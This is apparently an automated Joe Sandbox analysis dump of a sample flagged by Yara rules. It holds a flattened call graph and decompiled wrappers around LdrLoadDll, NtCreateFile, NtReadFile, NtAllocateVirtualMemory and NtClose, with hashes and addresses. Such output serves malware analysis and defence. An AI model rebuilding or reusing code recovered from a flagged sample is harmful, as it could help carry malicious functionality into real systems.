418a85 33674 4212c3 LdrLoadDll RtlFreeHeap 33556->33674 33558->33421 33560 419b14 33559->33560 33561 4191a3 8 API calls 33560->33561 33564 419b2a 33561->33564 33562 419b33 33562->33425 33563 419b67 33565 4200e3 2 API calls 33563->33565 33564->33562 33564->33563 33567 419bb3 33564->33567 33566 419b78 33565->33566 33566->33425 33568 4200e3 2 API calls 33567->33568 33569 419bb8 33568->33569 33569->33425 33571 41efb7 33570->33571 33572 41ee33 LdrLoadDll 33570->33572 33675 41ee33 33571->33675 33572->33571 33574 41efc0 33575 41ee33 LdrLoadDll 33574->33575 33576 41efc9 33575->33576 33577 41ee33 LdrLoadDll 33576->33577 33578 41efd2 33577->33578 33579 41ee33 LdrLoadDll 33578->33579 33580 41efdb 33579->33580 33581 41ee33 LdrLoadDll 33580->33581 33582 41efe4 33581->33582 33583 41ee33 LdrLoadDll 33582->33583 33584 41eff0 33583->33584 33585 41ee33 LdrLoadDll 33584->33585 33586 41eff9 33585->33586 33587 41ee33 LdrLoadDll 33586->33587 33588 41f002 33587->33588 33589 41ee33 LdrLoadDll 33588->33589 33590 41f00b 33589->33590 33591 41ee33 LdrLoadDll 33590->33591 33592 41f014 33591->33592 33593 41ee33 LdrLoadDll 33592->33593 33594 41f01d 33593->33594 33595 41ee33 LdrLoadDll 33594->33595 33596 41f029 33595->33596 33597 41ee33 LdrLoadDll 33596->33597 33598 41f032 33597->33598 33599 41ee33 LdrLoadDll 33598->33599 33600 41f03b 33599->33600 33601 41ee33 LdrLoadDll 33600->33601 33602 41f044 33601->33602 33603 41ee33 LdrLoadDll 33602->33603 33604 41f04d 33603->33604 33605 41ee33 LdrLoadDll 33604->33605 33606 41f056 33605->33606 33607 41ee33 LdrLoadDll 33606->33607 33608 41f062 33607->33608 33609 41ee33 LdrLoadDll 33608->33609 33610 41f06b 33609->33610 33611 41ee33 LdrLoadDll 33610->33611 33612 41f074 33611->33612 33613 41ee33 LdrLoadDll 33612->33613 33614 41f07d 33613->33614 33615 41ee33 LdrLoadDll 33614->33615 33616 41f086 33615->33616 33617 41ee33 LdrLoadDll 33616->33617 33618 41f08f 33617->33618 33619 41ee33 LdrLoadDll 33618->33619 33620 41f09b 33619->33620 33621 41ee33 LdrLoadDll 33620->33621 33622 41f0a4 33621->33622 33623 41ee33 LdrLoadDll 33622->33623 33624 41f0ad 33623->33624 33625 41ee33 LdrLoadDll 33624->33625 33626 41f0b6 33625->33626 33627 41ee33 LdrLoadDll 33626->33627 33628 41f0bf 33627->33628 33629 41ee33 LdrLoadDll 33628->33629 33630 41f0c8 33629->33630 33631 41ee33 LdrLoadDll 33630->33631 33632 41f0d4 33631->33632 33633 41ee33 LdrLoadDll 33632->33633 33634 41f0dd 33633->33634 33635 41ee33 LdrLoadDll 33634->33635 33636 41f0e6 33635->33636 33637 41ee33 LdrLoadDll 33636->33637 33638 41f0ef 33637->33638 33639 41ee33 LdrLoadDll 33638->33639 33640 41f0f8 33639->33640 33641 41ee33 LdrLoadDll 33640->33641 33642 41f101 33641->33642 33643 41ee33 LdrLoadDll 33642->33643 33644 41f10d 33643->33644 33645 41ee33 LdrLoadDll 33644->33645 33646 41f116 33645->33646 33647 41ee33 LdrLoadDll 33646->33647 33648 41f11f 33647->33648 33648->33429 33650 41f1b3 LdrLoadDll 33649->33650 33651 41e0df 33650->33651 33681 17f9860 LdrInitializeThunk 33651->33681 33652 41e0f6 33652->33431 33654->33426 33656 41f1b3 LdrLoadDll 33655->33656 33657 41e75f NtAllocateVirtualMemory 33656->33657 33657->33525 33659 421273 33658->33659 33660 421279 33658->33660 33659->33531 33661 4201c3 2 API calls 33660->33661 33662 42129f 33661->33662 33662->33531 33664 421303 33663->33664 33665 4201c3 2 API calls 33664->33665 33668 421360 33664->33668 33666 42133d 33665->33666 33667 4200e3 2 API calls 33666->33667 33667->33668 33668->33539 33669->33535 33670->33549 33671->33551 33672->33554 33673->33556 33674->33558 33676 41ee4e 33675->33676 33677 4195b3 LdrLoadDll 33676->33677 33678 41ee6e 33677->33678 33679 4195b3 LdrLoadDll 33678->33679 33680 41ef22 33678->33680 33679->33680 33680->33574 33680->33680 33681->33652 33683 17f968f LdrInitializeThunk 33682->33683 33684 17f9681 33682->33684 33683->33435 33684->33435 33686 41e88f RtlFreeHeap 33685->33686 33687 41f1b3 LdrLoadDll 33685->33687 33686->33438 33687->33686 33689 409433 33688->33689 33690 40942e 33688->33690 33691 420063 2 API calls 33689->33691 33690->33370 33697 409458 33691->33697 33692 4094bb 33692->33370 33693 41e0c3 2 API calls 33693->33697 33694 4094c1 33696 4094e7 33694->33696 33698 41e7c3 2 API calls 33694->33698 33696->33370 33697->33692 33697->33693 33697->33694 33700 420063 2 API calls 33697->33700 33704 41e7c3 33697->33704 33699 4094d8 33698->33699 33699->33370 33700->33697 33702 409701 33701->33702 33703 41e7c3 2 API calls 33701->33703 33702->33331 33703->33702 33705 41f1b3 LdrLoadDll 33704->33705 33706 41e7df 33705->33706 33709 17f96e0 LdrInitializeThunk 33706->33709 33707 41e7f6 33707->33697 33709->33707 33711 41f846 33710->33711 33712 40cf03 LdrLoadDll 33711->33712 33713 40bdb4 33712->33713 33713->33339 33715 40d276 33714->33715 33716 40d2f0 33715->33716 33727 41de93 LdrLoadDll 33715->33727 33716->33344 33719 41e9f2 LookupPrivilegeValueW 33718->33719 33720 41f1b3 LdrLoadDll 33718->33720 33719->33348 33720->33719 33722 41e471 33721->33722 33723 41f1b3 LdrLoadDll 33722->33723 33724 41e47f 33723->33724 33728 17f9910 LdrInitializeThunk 33724->33728 33725 41e49e 33725->33351 33727->33716 33728->33725 33730 40d3fa 33729->33730 33731 40d253 LdrLoadDll 33730->33731 33732 40d45d 33731->33732 33732->33301 33734 40ff6d 33733->33734 33742 410023 33733->33742 33735 40d253 LdrLoadDll 33734->33735 33736 40ff8f 33735->33736 33743 41e143 33736->33743 33738 40ffd1 33746 41e183 33738->33746 33741 41e693 2 API calls 33741->33742 33742->33304 33742->33305 33744 41e15f 33743->33744 33745 41f1b3 LdrLoadDll 33743->33745 33744->33738 33745->33744 33747 41f1b3 LdrLoadDll 33746->33747 33748 41e19f 33747->33748 33751 17f9fe0 LdrInitializeThunk 33748->33751 33749 410017 33749->33741 33751->33749 33753 40dd8e 33752->33753 33754 40d3d3 LdrLoadDll 33753->33754 33755 40dde5 33754->33755 33788 40d053 33755->33788 33757 40e05c 33757->33318 33758 40de0b 33758->33757 33797 418ad3 33758->33797 33760 40de50 33760->33757 33800 40a053 33760->33800 33762 40de94 33762->33757 33822 41e703 33762->33822 33766 40deea 33767 40def1 33766->33767 33835 41e213 33766->33835 33768 4200e3 2 API calls 33767->33768 33770 40defe 33768->33770 33770->33318 33772 40df3b 33773 4200e3 2 API calls 33772->33773 33774 40df42 33773->33774 33774->33318 33775 40df4b 33776 410113 3 API calls 33775->33776 33777 40dfbf 33776->33777 33777->33767 33778 40dfca 33777->33778 33779 4200e3 2 API calls 33778->33779 33780 40dfee 33779->33780 33840 41e263 33780->33840 33783 41e213 2 API calls 33784 40e029 33783->33784 33784->33757 33845 41e023 33784->33845 33787 41e8b3 2 API calls 33787->33757 33789 40d060 33788->33789 33790 40d064 33788->33790 33789->33758 33791 40d0af 33790->33791 33792 40d07d 33790->33792 33851 41ded3 LdrLoadDll 33791->33851 33850 41ded3 LdrLoadDll 33792->33850 33794 40d0c0 33794->33758 33796 40d09f 33796->33758 33798 410113 3 API calls 33797->33798 33799 418af9 33797->33799 33798->33799 33799->33760 33852 40a283 33800->33852 33802 40a279 33802->33762 33803 40a071 33803->33802 33804 409423 4 API calls 33803->33804 33805 40a14f 33803->33805 33815 40a0af 33804->33815 33805->33802 33806 40a22f 33805->33806 33808 409423 4 API calls 33805->33808 33806->33802 33901 410383 10 API calls 33806->33901 33819 40a18c 33808->33819 33809 40a243 33809->33802 33902 410383 10 API calls 33809->33902 33811 40a259 33811->33802 33903 410383 10 API calls 33811->33903 33813 40a26f 33813->33762 33815->33805 33816 40a145 33815->33816 33866 409d33 33815->33866 33817 4096e3 2 API calls 33816->33817 33817->33805 33818 409d33 14 API calls 33818->33819 33819->33806 33819->33818 33820 40a225 33819->33820 33821 4096e3 2 API calls 33820->33821 33821->33806 33823 41e719 33822->33823 33824 41f1b3 LdrLoadDll 33823->33824 33825 41e71f 33824->33825 34020 17f98f0 LdrInitializeThunk 33825->34020 33826 40decb 33828 410113 33826->33828 33829 410130 33828->33829 34021 41e1c3 33829->34021 33832 410178 33832->33766 33833 41e213 2 API calls 33834 4101a1 33833->33834 33834->33766 33836 41f1b3 LdrLoadDll 33835->33836 33837 41e22f 33836->33837 34027 17f9780 LdrInitializeThunk 33837->34027 33838 40df2e 33838->33772 33838->33775 33841 41f1b3 LdrLoadDll 33840->33841 33842 41e27f 33841->33842 34028 17f97a0 LdrInitializeThunk 33842->34028 33843 40e002 33843->33783 33846 41f1b3 LdrLoadDll 33845->33846 33847 41e03f 33846->33847 34029 17f9a20 LdrInitializeThunk 33847->34029 33848 40e055 33848->33787 33850->33796 33851->33794 33853 40a2aa 33852->33853 33854 409423 4 API calls 33853->33854 33861 40a50f 33853->33861 33855 40a2fd 33854->33855 33856 4096e3 2 API calls 33855->33856 33855->33861 33857 40a38c 33856->33857 33858 409423 4 API calls 33857->33858 33857->33861 33859 40a3a1 33858->33859 33860 4096e3 2 API calls 33859->33860 33859->33861 33864 40a401 33860->33864 33861->33803 33862 409423 4 API calls 33862->33864 33863 409d33 14 API calls 33863->33864 33864->33861 33864->33862 33864->33863 33865 4096e3 2 API calls 33864->33865 33865->33864 33867 409d3e 33866->33867 33904 409d9f 33867->33904 33869 409d87 33935 41df13 33869->33935 33872 409dac 33872->33815 33873 409e2d 33968 410263 LdrLoadDll NtClose 33873->33968 33874 41e103 2 API calls 33875 409dd0 33874->33875 33875->33873 33877 409ddb 33875->33877 33878 409e59 33877->33878 33938 40e073 33877->33938 33878->33815 33879 409e48 33881 409e65 33879->33881 33882 409e4f 33879->33882 33969 41df93 LdrLoadDll 33881->33969 33884 41e693 2 API calls 33882->33884 33883 409df5 33883->33878 33958 409b63 33883->33958 33884->33878 33886 409e90 33888 40e073 5 API calls 33886->33888 33890 409eb0 33888->33890 33890->33878 33970 41dfc3 LdrLoadDll 33890->33970 33892 409ed5 33971 41e053 LdrLoadDll 33892->33971 33894 409eef 33895 41e023 2 API calls 33894->33895 33896 409efe 33895->33896 33897 41e693 2 API calls 33896->33897 33898 409f08 33897->33898 33972 409933 33898->33972 33900 409f1c 33900->33815 33901->33809 33902->33811 33903->33813 33905 409db4 33904->33905 33906 409dac 33904->33906 33907 409e2d 33905->33907 33908 41e103 2 API calls 33905->33908 33906->33869 33988 410263 LdrLoadDll NtClose 33907->33988 33909 409dd0 33908->33909 33909->33907 33911 409ddb 33909->33911 33912 409e59 33911->33912 33914 40e073 5 API calls 33911->33914 33912->33869 33913 409e48 33915 409e65 33913->33915 33916 409e4f 33913->33916 33917 409df5 33914->33917 33989 41df93 LdrLoadDll 33915->33989 33918 41e693 2 API calls 33916->33918 33917->33912 33921 409b63 12 API calls 33917->33921 33918->33912 33920 409e90 33922 40e073 5 API calls 33920->33922 33923 409e23 33921->33923 33924 409eb0 33922->33924 33923->33869 33924->33912 33990 41dfc3 LdrLoadDll 33924->33990 33926 409ed5 33991 41e053 LdrLoadDll 33926->33991 33928 409eef 33929 41e023 2 API calls 33928->33929 33930 409efe 33929->33930 33931 41e693 2 API calls 33930->33931 33932 409f08 33931->33932 33933 409933 11 API calls 33932->33933 33934 409f1c 33933->33934 33934->33869 33936 41f1b3 LdrLoadDll 33935->33936 33937 409da2 33935->33937 33936->33937 33937->33872 33937->33873 33937->33874 33939 40e0a1 33938->33939 33940 410113 3 API calls 33939->33940 33941 40e103 33940->33941 33942 40e14c 33941->33942 33943 41e213 2 API calls 33941->33943 33942->33883 33944 40e12e 33943->33944 33945 40e138 33944->33945 33949 40e158 33944->33949 33946 41e263 2 API calls 33945->33946 33947 40e142 33946->33947 33948 41e693 2 API calls 33947->33948 33948->33942 33950 40e1e2 33949->33950 33951 40e1c5 33949->33951 33953 41e263 2 API calls 33950->33953 33952 41e693 2 API calls 33951->33952 33954 40e1cf 33952->33954 33955 40e1f1 33953->33955 33954->33883 33956 41e693 2 API calls 33955->33956 33957 40e1fb 33956->33957 33957->33883 33959 409b79 33958->33959 33964 409d04 33959->33964 33992 409723 33959->33992 33961 409c78 33962 409933 11 API calls 33961->33962 33961->33964 33963 409ca6 33962->33963 33963->33964 33965 41e103 2 API calls 33963->33965 33964->33815 33966 409cdb 33965->33966 33966->33964 33967 41e703 2 API calls 33966->33967 33967->33964 33968->33879 33969->33886 33970->33892 33971->33894 33973 40995c 33972->33973 33999 409893 33973->33999 33976 41e703 2 API calls 33977 40996f 33976->33977 33977->33976 33978 4099fa 33977->33978 33981 4099f5 33977->33981 34007 4102e3 33977->34007 33978->33900 33979 41e693 2 API calls 33980 409a2d 33979->33980 33980->33978 33982 41df13 LdrLoadDll 33980->33982 33981->33979 33983 409a92 33982->33983 33983->33978 34011 41df53 33983->34011 33985 409af6 33985->33978 33986 4191a3 8 API calls 33985->33986 33987 409b4b 33986->33987 33987->33900 33988->33913 33989->33920 33990->33926 33991->33928 33993 409822 33992->33993 33994 409738 33992->33994 33993->33961 33994->33993 33995 4191a3 8 API calls 33994->33995 33996 4097a5 33995->33996 33997 4200e3 2 API calls 33996->33997 33998 4097cc 33996->33998 33997->33998 33998->33961 34000 4098ad 33999->34000 34001 40cf03 LdrLoadDll 34000->34001 34002 4098c8 34001->34002 34003 4195b3 LdrLoadDll 34002->34003 34004 4098e0 34003->34004 34005 4098fc 34004->34005 34006 4098e9 PostThreadMessageW 34004->34006 34005->33977 34006->34005 34008 4102f6 34007->34008 34014 41e093 34008->34014 34012 41f1b3 LdrLoadDll 34011->34012 34013 41df6f 34012->34013 34013->33985 34015 41e0af 34014->34015 34016 41f1b3 LdrLoadDll 34014->34016 34019 17f9840 LdrInitializeThunk 34015->34019 34016->34015 34017 410321 34017->33977 34019->34017 34020->33826 34022 41f1b3 LdrLoadDll 34021->34022 34023 41e1df 34022->34023 34026 17f99a0 LdrInitializeThunk 34023->34026 34024 410171 34024->33832 34024->33833 34026->34024 34027->33838 34028->33843 34029->33848 34032 17f9540 LdrInitializeThunk

                                                    Executed Functions

                                                    Function 0040CF03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 407 40cf03-40cf1f 408 40cf27-40cf2c 407->408 409 40cf22 call 420e83 407->409 410 40cf32-40cf40 call 4213a3 408->410 411 40cf2e-40cf31 408->411 409->408 414 40cf50-40cf61 call 41f723 410->414 415 40cf42-40cf4d call 421623 410->415 420 40cf63-40cf77 LdrLoadDll 414->420 421 40cf7a-40cf7d 414->421 415->414 420->421
                                                    C-Code - Quality: 100%
                                                    			E0040CF03(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420E83( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E004213A3(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421623( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F723(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                    0x0040cf1f
                                                    0x0040cf22
                                                    0x0040cf27
                                                    0x0040cf2c
                                                    0x0040cf36
                                                    0x0040cf3b
                                                    0x0040cf3e
                                                    0x0040cf40
                                                    0x0040cf48
                                                    0x0040cf4d
                                                    0x0040cf4d
                                                    0x0040cf54
                                                    0x0040cf5c
                                                    0x0040cf5f
                                                    0x0040cf61
                                                    0x0040cf75
                                                    0x00000000
                                                    0x0040cf77
                                                    0x0040cf7d
                                                    0x0040cf31
                                                    0x0040cf31
                                                    0x0040cf31

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF75
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 1f79ec65728361f6aacc61d0b8ee144499b1802415a85c76e63a64ecc08ce9c1
                                                    • Instruction ID: 50010c7138d93e6f9ea6e265deb9c9d9996512de15ce5229bf2c89d0c65d76ae
                                                    • Opcode Fuzzy Hash: 1f79ec65728361f6aacc61d0b8ee144499b1802415a85c76e63a64ecc08ce9c1
                                                    • Instruction Fuzzy Hash: D20152B1E4010EB7DB10DBE1DC82FDEB3789B14308F0042A6F908A7281F634EB448B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E65D Relevance: 1.5, APIs: 1, Instructions: 46filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 422 41e65d-41e661 423 41e663-41e68c call 41f1b3 422->423 424 41e62c-41e65c NtReadFile 422->424
                                                    APIs
                                                    • NtReadFile.NTDLL(004194D3,004149A1,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A1,004194D3,00000002,00000000), ref: 0041E658
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 989a99728f5d3fd41f55dbeef6ea95967e5b171b9bc780f8826328b2e2f7ccf5
                                                    • Instruction ID: 7f92864f45cf3ca67b45b990d53c327ffe0249674551ab4ccc4cabb80f823d68
                                                    • Opcode Fuzzy Hash: 989a99728f5d3fd41f55dbeef6ea95967e5b171b9bc780f8826328b2e2f7ccf5
                                                    • Instruction Fuzzy Hash: 58014B72204204BFCB14DF99DC85DD77BADEF8C350F108549FA5C8B201C634E8518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E563 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 428 41e563-41e5b4 call 41f1b3 NtCreateFile
                                                    C-Code - Quality: 100%
                                                    			E0041E563(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                    0x0041e572
                                                    0x0041e57a
                                                    0x0041e5b0
                                                    0x0041e5b4

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5B0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                    • Instruction ID: 858a361c7fac73dd57bd9bb54302a998ea006c4b18dec6683183bae7ba4cde4d
                                                    • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                    • Instruction Fuzzy Hash: D0F06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158258BA0997241D630E8518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E613 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 437 41e613-41e65c call 41f1b3 NtReadFile
                                                    C-Code - Quality: 25%
                                                    			E0041E613(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t14;
				signed int _t15;
				void* _t19;
				intOrPtr _t21;
				intOrPtr* _t27;

				_t14 = _a4;
				_t21 =  *((intOrPtr*)(_t14 + 0x14));
				_t3 = _t14 + 0xa74; // 0xa76
				_t27 = _t3;
				_t15 = E0041F1B3(_t21, _t14, _t27, _t21, 0, 0x2a);
				 *((intOrPtr*)(__ebx + 0x458b2c55)) =  *((intOrPtr*)(__ebx + 0x458b2c55)) + _t21;
				 *((intOrPtr*)(__ebx - 0x3b7cdbb3)) =  *((intOrPtr*)(__ebx - 0x3b7cdbb3)) - _t21;
				asm("adc al, 0x52");
				_t19 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _t21, _t15 |  *_t15); // executed
				return _t19;
			}








                                                    0x0041e616
                                                    0x0041e619
                                                    0x0041e622
                                                    0x0041e622
                                                    0x0041e62a
                                                    0x0041e62e
                                                    0x0041e634
                                                    0x0041e63a
                                                    0x0041e658
                                                    0x0041e65c

                                                    APIs
                                                    • NtReadFile.NTDLL(004194D3,004149A1,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A1,004194D3,00000002,00000000), ref: 0041E658
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                    • Instruction ID: 7e6d20b8ab43ac4c6dd8b0e9747e979c985991331e4e85b11870b547d3735a74
                                                    • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                    • Instruction Fuzzy Hash: 27F0FFB2200208ABCB04DF89DC84EEB77ADAF8C754F018208BE0DA7241C630E8118BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E743 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 440 41e743-41e780 call 41f1b3 NtAllocateVirtualMemory
                                                    C-Code - Quality: 100%
                                                    			E0041E743(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                    0x0041e75a
                                                    0x0041e77c
                                                    0x0041e780

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E77C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                    • Instruction ID: 0a6495e8f7e44f4a31df3bacb5b33776950b50f0b2a852a5fc142efbc3aec1ab
                                                    • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                    • Instruction Fuzzy Hash: B0F01EB2210208ABCB18DF89DC81EEB77ADAF88754F018119BE0897241C630F821CBF4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E68F Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041E68F(void* __eax, void* __esi, intOrPtr _a4, void* _a8) {
				long _t15;

				_t12 = _a4;
				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _t12, _t12 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t15 = NtClose(_a8); // executed
				return _t15;
			}




                                                    0x0041e696
                                                    0x0041e6aa
                                                    0x0041e6b8
                                                    0x0041e6bc

                                                    APIs
                                                    • NtClose.NTDLL(004102C8,00000000,?,004102C8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6B8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 9fc0b77864bc79e118e7065a84f160bb50efa7f73b5c36ea076cc26817774705
                                                    • Instruction ID: f9cd73a8d8550e9af34dccee213d7d49f29f51c87b206270a25c4ed3f04bde21
                                                    • Opcode Fuzzy Hash: 9fc0b77864bc79e118e7065a84f160bb50efa7f73b5c36ea076cc26817774705
                                                    • Instruction Fuzzy Hash: 4EE08C32A00314AFD710EF98CC46F973BA8DF48660F01845ABA189B242C670E9108BE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E693 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0041E693(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F1B3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                    0x0041e6aa
                                                    0x0041e6b8
                                                    0x0041e6bc

                                                    APIs
                                                    • NtClose.NTDLL(004102C8,00000000,?,004102C8,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6B8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578277882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_P5348574_74676.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                    • Instruction ID: 42318626d70f5b73991a76424c016a3848acfe8a2a5351ee0a56f11cd2c8e816
                                                    • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                    • Instruction Fuzzy Hash: 8FD01772604214BBD610EBA9DC89FD77BACDF48664F018469BA1C5B242C570FA108AE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017F9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6c2708dda2be760c744d6489950c2ec9be27e3bd7d8cab3c32cef5d642cbe424
                                                    • Instruction ID: c215d56c82d183c3102e13118a50a494f844082daa8f5aa7f24e3b63d0e1323d
                                                    • Opcode Fuzzy Hash: 6c2708dda2be760c744d6489950c2ec9be27e3bd7d8cab3c32cef5d642cbe424
                                                    • Instruction Fuzzy Hash: 4F9002B120100802D18171D948047460005A7D1341F51C111A6058668EC6D98ED976A5
                                                    Uniqueness

